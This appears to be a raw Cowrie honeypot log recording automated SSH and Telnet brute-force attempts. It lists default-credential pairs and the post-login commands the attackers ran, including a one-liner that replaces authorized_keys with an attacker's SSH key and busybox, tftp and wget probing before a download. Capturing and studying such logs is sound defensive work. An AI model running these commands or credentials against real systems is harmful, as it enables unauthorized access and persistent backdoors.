{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:10:40.339779Z","src_ip":"212.227.235.229","session":"ba5ce3517cec"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:40.546950Z","src_ip":"212.227.235.229","session":"ba5ce3517cec"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:40.547970Z","src_ip":"212.227.235.229","session":"96cd6486d3d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40476,"dst_ip":"1.2.3.4","dst_port":22,"session":"91d5d5b76c91","protocol":"ssh","message":"New connection: 212.227.235.229:40476 (1.2.3.4:22) [session: 91d5d5b76c91]","sensor":"my-vps","timestamp":"2025-08-28T16:11:14.203989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:11:14.204925Z","src_ip":"212.227.235.229","session":"91d5d5b76c91"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:11:14.429591Z","src_ip":"212.227.235.229","session":"91d5d5b76c91"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest2025","message":"login attempt [guest/guest2025] failed","sensor":"my-vps","timestamp":"2025-08-28T16:11:15.369499Z","src_ip":"212.227.235.229","session":"91d5d5b76c91"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:11:16.597356Z","src_ip":"212.227.235.229","session":"91d5d5b76c91"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:11:16.840571Z","src_ip":"212.227.235.229","session":"c9bd7e109295"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48114,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdb33d0d20a5","protocol":"ssh","message":"New connection: 212.227.235.229:48114 (1.2.3.4:22) [session: cdb33d0d20a5]","sensor":"my-vps","timestamp":"2025-08-28T16:11:46.771527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:11:46.773292Z","src_ip":"212.227.235.229","session":"cdb33d0d20a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:11:47.079247Z","src_ip":"212.227.235.229","session":"cdb33d0d20a5"}
{"eventid":"cowrie.login.success","username":"root","password":"7070","message":"login attempt [root/7070] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:11:48.346369Z","src_ip":"212.227.235.229","session":"cdb33d0d20a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:11:48.977295Z","src_ip":"212.227.235.229","session":"cdb33d0d20a5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:11:48.978188Z","src_ip":"212.227.235.229","session":"cdb33d0d20a5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:11:48.979396Z","src_ip":"212.227.235.229","session":"cdb33d0d20a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:11:49.286439Z","src_ip":"212.227.235.229","session":"cdb33d0d20a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59448,"dst_ip":"1.2.3.4","dst_port":22,"session":"2145522c9140","protocol":"ssh","message":"New connection: 212.227.235.229:59448 (1.2.3.4:22) [session: 2145522c9140]","sensor":"my-vps","timestamp":"2025-08-28T16:11:49.550387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:11:49.551160Z","src_ip":"212.227.235.229","session":"2145522c9140"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:11:49.758093Z","src_ip":"212.227.235.229","session":"2145522c9140"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:11:49.953949Z","src_ip":"212.227.235.229","session":"cdb33d0d20a5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:11:49.954626Z","src_ip":"212.227.235.229","session":"cdb33d0d20a5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:11:50.263869Z","src_ip":"212.227.235.229","session":"cdb33d0d20a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:11:50.264905Z","src_ip":"212.227.235.229","session":"cdb33d0d20a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33752,"dst_ip":"1.2.3.4","dst_port":22,"session":"e89f43794e13","protocol":"ssh","message":"New connection: 212.227.235.229:33752 (1.2.3.4:22) [session: e89f43794e13]","sensor":"my-vps","timestamp":"2025-08-28T16:11:50.578792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:11:50.579800Z","src_ip":"212.227.235.229","session":"e89f43794e13"}
{"eventid":"cowrie.login.failed","username":"sa","password":"password","message":"login attempt [sa/password] failed","sensor":"my-vps","timestamp":"2025-08-28T16:11:50.626135Z","src_ip":"212.227.235.229","session":"2145522c9140"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:11:50.894599Z","src_ip":"212.227.235.229","session":"e89f43794e13"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:11:51.834721Z","src_ip":"212.227.235.229","session":"2145522c9140"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:11:52.196981Z","src_ip":"212.227.235.229","session":"e89f43794e13"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:11:53.515111Z","src_ip":"212.227.235.229","session":"e89f43794e13"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33766,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ed736d03a9d","protocol":"ssh","message":"New connection: 212.227.235.229:33766 (1.2.3.4:22) [session: 6ed736d03a9d]","sensor":"my-vps","timestamp":"2025-08-28T16:11:53.828981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:11:53.829980Z","src_ip":"212.227.235.229","session":"6ed736d03a9d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:11:54.145821Z","src_ip":"212.227.235.229","session":"6ed736d03a9d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:11:55.447471Z","src_ip":"212.227.235.229","session":"6ed736d03a9d"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:11:55.766790Z","src_ip":"212.227.235.229","session":"cdb33d0d20a5"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:11:55.767811Z","src_ip":"212.227.235.229","session":"6ed736d03a9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56980,"dst_ip":"1.2.3.4","dst_port":23,"session":"c6c19b5fed4e","protocol":"telnet","message":"New connection: 212.227.125.160:56980 (1.2.3.4:23) [session: c6c19b5fed4e]","sensor":"my-vps","timestamp":"2025-08-28T16:12:02.790446Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:12:04.868104Z","src_ip":"212.227.125.160","session":"c6c19b5fed4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44764,"dst_ip":"1.2.3.4","dst_port":23,"session":"4f12fae8b87d","protocol":"telnet","message":"New connection: 212.227.235.229:44764 (1.2.3.4:23) [session: 4f12fae8b87d]","sensor":"my-vps","timestamp":"2025-08-28T16:12:05.197281Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:12:06.009247Z","src_ip":"212.227.235.229","session":"4f12fae8b87d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:12:06.454212Z","src_ip":"212.227.235.229","session":"4f12fae8b87d"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-08-28T16:12:06.503492Z","src_ip":"212.227.235.229","session":"4f12fae8b87d"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T16:12:06.861073Z","src_ip":"212.227.235.229","session":"4f12fae8b87d"}
{"eventid":"cowrie.session.closed","duration":4.274545907974243,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:12:07.064889Z","src_ip":"212.227.125.160","session":"c6c19b5fed4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56984,"dst_ip":"1.2.3.4","dst_port":23,"session":"6061185a16bb","protocol":"telnet","message":"New connection: 212.227.125.160:56984 (1.2.3.4:23) [session: 6061185a16bb]","sensor":"my-vps","timestamp":"2025-08-28T16:12:07.276265Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0","size":514,"shasum":"2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0 after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:12:08.160099Z","src_ip":"212.227.235.229","session":"4f12fae8b87d"}
{"eventid":"cowrie.session.closed","duration":2.967705488204956,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:12:08.164909Z","src_ip":"212.227.235.229","session":"4f12fae8b87d"}
{"eventid":"cowrie.session.closed","duration":1.0857102870941162,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:12:08.361904Z","src_ip":"212.227.125.160","session":"6061185a16bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56990,"dst_ip":"1.2.3.4","dst_port":23,"session":"914c49aed248","protocol":"telnet","message":"New connection: 212.227.125.160:56990 (1.2.3.4:23) [session: 914c49aed248]","sensor":"my-vps","timestamp":"2025-08-28T16:12:08.581273Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:12:10.389843Z","src_ip":"212.227.125.160","session":"914c49aed248"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:12:10.412358Z","src_ip":"212.227.125.160","session":"914c49aed248"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"2.2","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:12:12.580248Z","src_ip":"212.227.125.160","session":"914c49aed248"}
{"eventid":"cowrie.session.closed","duration":4.004060983657837,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:12:12.585263Z","src_ip":"212.227.125.160","session":"914c49aed248"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37484,"dst_ip":"1.2.3.4","dst_port":22,"session":"646a7964af9f","protocol":"ssh","message":"New connection: 212.227.235.229:37484 (1.2.3.4:22) [session: 646a7964af9f]","sensor":"my-vps","timestamp":"2025-08-28T16:12:25.837643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:12:25.838520Z","src_ip":"212.227.235.229","session":"646a7964af9f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:12:26.068835Z","src_ip":"212.227.235.229","session":"646a7964af9f"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"pass1234","message":"login attempt [oracle/pass1234] failed","sensor":"my-vps","timestamp":"2025-08-28T16:12:27.029695Z","src_ip":"212.227.235.229","session":"646a7964af9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":5132,"dst_ip":"1.2.3.4","dst_port":23,"session":"ebd88ffb86e8","protocol":"telnet","message":"New connection: 212.227.235.229:5132 (1.2.3.4:23) [session: ebd88ffb86e8]","sensor":"my-vps","timestamp":"2025-08-28T16:12:27.290801Z"}
{"eventid":"cowrie.login.success","username":"root","password":"dreambox","message":"login attempt [root/dreambox] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:12:27.708493Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:12:27.726969Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-28T16:12:27.852548Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-28T16:12:27.854655Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-28T16:12:27.855860Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-28T16:12:27.856735Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-28T16:12:27.857533Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-28T16:12:27.858317Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox VYDBV","message":"CMD: cat /proc/mounts; /bin/busybox VYDBV","sensor":"my-vps","timestamp":"2025-08-28T16:12:27.985020Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox VYDBV","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox VYDBV","sensor":"my-vps","timestamp":"2025-08-28T16:12:28.113796Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox VYDBV","message":"CMD: tftp; wget; /bin/busybox VYDBV","sensor":"my-vps","timestamp":"2025-08-28T16:12:28.241648Z","src_ip":"212.227.235.229","session":"ebd88ffb86e8"}
